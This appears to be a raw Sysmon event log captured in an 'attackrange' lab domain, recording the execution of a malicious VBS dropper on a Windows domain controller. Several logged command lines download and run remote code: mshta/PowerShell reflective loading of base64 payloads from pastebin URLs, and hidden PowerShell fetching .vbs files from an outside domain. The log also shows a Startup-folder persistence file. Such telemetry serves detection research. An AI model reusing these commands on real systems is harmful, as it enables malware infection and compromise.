08:03:04.671{58E9C193-B538-615A-6C02-00000000FC01}38248136C:\Windows\system32\conhost.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107858Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7002-00000000FC01}7676C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-B538-615A-6902-00000000FC01}42005300C:\Windows\System32\cmd.exe{58E9C193-B538-615A-7002-00000000FC01}7676C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.676{58E9C193-B538-615A-7002-00000000FC01}7676C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6E02-00000000FC01}7812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.671{58E9C193-B538-615A-6802-00000000FC01}81002856C:\Windows\System32\WScript.exe{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.674{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6C02-00000000FC01}3824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-B538-615A-6802-00000000FC01}81007232C:\Windows\System32\WScript.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.665{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/TR.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.656{58E9C193-B538-615A-6802-00000000FC01}81005100C:\Windows\System32\WScript.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.652{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google01.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.640{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6A02-00000000FC01}6456C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.640{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6A02-00000000FC01}6456C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.640{58E9C193-B538-615A-6A02-00000000FC01}64561500C:\Windows\system32\conhost.exe{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:03:04.640{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbs2021-10-04 07:44:22.066 23542300x8000000000000000107832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.640{58E9C193-B538-615A-6802-00000000FC01}8100ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbsMD5=C29778E3F6B2E3EF93316EF23450C027,SHA256=A6569F10F2E4BEC3470B2D5B227061E92AC6F5D5DCA3CE450C15A0F250A9CDAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.635{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6A02-00000000FC01}6456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.618{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-6902-00000000FC01}4200C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 